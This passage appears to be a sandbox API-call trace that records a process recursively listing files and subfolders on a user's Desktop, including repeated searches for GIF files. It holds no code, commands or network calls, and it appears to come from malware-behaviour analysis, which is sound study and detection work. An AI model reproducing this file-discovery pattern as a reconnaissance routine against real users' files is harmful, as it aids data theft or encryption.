cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d8d490, ftCreationTime.dwHighDateTime=0x1d5cd75, ftLastAccessTime.dwLowDateTime=0x2c2b1a50, ftLastAccessTime.dwHighDateTime=0x1d5ccef, ftLastWriteTime.dwLowDateTime=0x2c2b1a50, ftLastWriteTime.dwHighDateTime=0x1d5ccef, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif", cAlternateFileName="MCQMPN~1.GIF")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0063.320] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0063.320] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84cebd0, ftCreationTime.dwHighDateTime=0x1d5d2da, ftLastAccessTime.dwLowDateTime=0xc11d8380, ftLastAccessTime.dwHighDateTime=0x1d5d10b, ftLastWriteTime.dwLowDateTime=0xc11d8380, ftLastWriteTime.dwHighDateTime=0x1d5d10b, nFileSizeHigh=0x0, nFileSizeLow=0x3443, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg", cAlternateFileName="W3NCKP~1.JPG")) returned 1 [0063.320] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0063.320] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0063.320] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0063.320] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0063.320] FindClose (in: hFindFile=0x9bf200 | out: hFindFile=0x9bf200) returned 1 [0063.320] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.gif", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c346c0, ftCreationTime.dwHighDateTime=0x1d5c79c, ftLastAccessTime.dwLowDateTime=0xc13b08a0, ftLastAccessTime.dwHighDateTime=0x1d5d463, ftLastWriteTime.dwLowDateTime=0xc13b08a0, ftLastWriteTime.dwHighDateTime=0x1d5d463, nFileSizeHigh=0x0, nFileSizeLow=0x4b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif", cAlternateFileName="")) returned 0x9be7e0 [0063.330] FindNextFileW (in: hFindFile=0x9be7e0, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2942aad0, ftCreationTime.dwHighDateTime=0x1d5d5cb, ftLastAccessTime.dwLowDateTime=0x3520ea30, ftLastAccessTime.dwHighDateTime=0x1d5d358, ftLastWriteTime.dwLowDateTime=0x3520ea30, ftLastWriteTime.dwHighDateTime=0x1d5d358, nFileSizeHigh=0x0, nFileSizeLow=0x10253, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif", cAlternateFileName="J51YJL~1.GIF")) returned 1 [0063.330] FindNextFileW (in: hFindFile=0x9be7e0, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d8d490, ftCreationTime.dwHighDateTime=0x1d5cd75, ftLastAccessTime.dwLowDateTime=0x2c2b1a50, ftLastAccessTime.dwHighDateTime=0x1d5ccef, ftLastWriteTime.dwLowDateTime=0x2c2b1a50, ftLastWriteTime.dwHighDateTime=0x1d5ccef, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif", cAlternateFileName="MCQMPN~1.GIF")) returned 1 [0063.330] FindNextFileW (in: hFindFile=0x9be7e0, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0063.330] FindClose (in: hFindFile=0x9be7e0 | out: hFindFile=0x9be7e0) returned 1 [0063.330] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf020 [0063.330] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0063.331] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0063.332] FindClose (in: hFindFile=0x9bf020 | out: hFindFile=0x9bf020) returned 1 [0063.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.gif", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf140 [0063.332] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.332] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0063.332] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0063.333] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0063.334] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.gif", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.334] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed80 [0063.334] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.334] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", 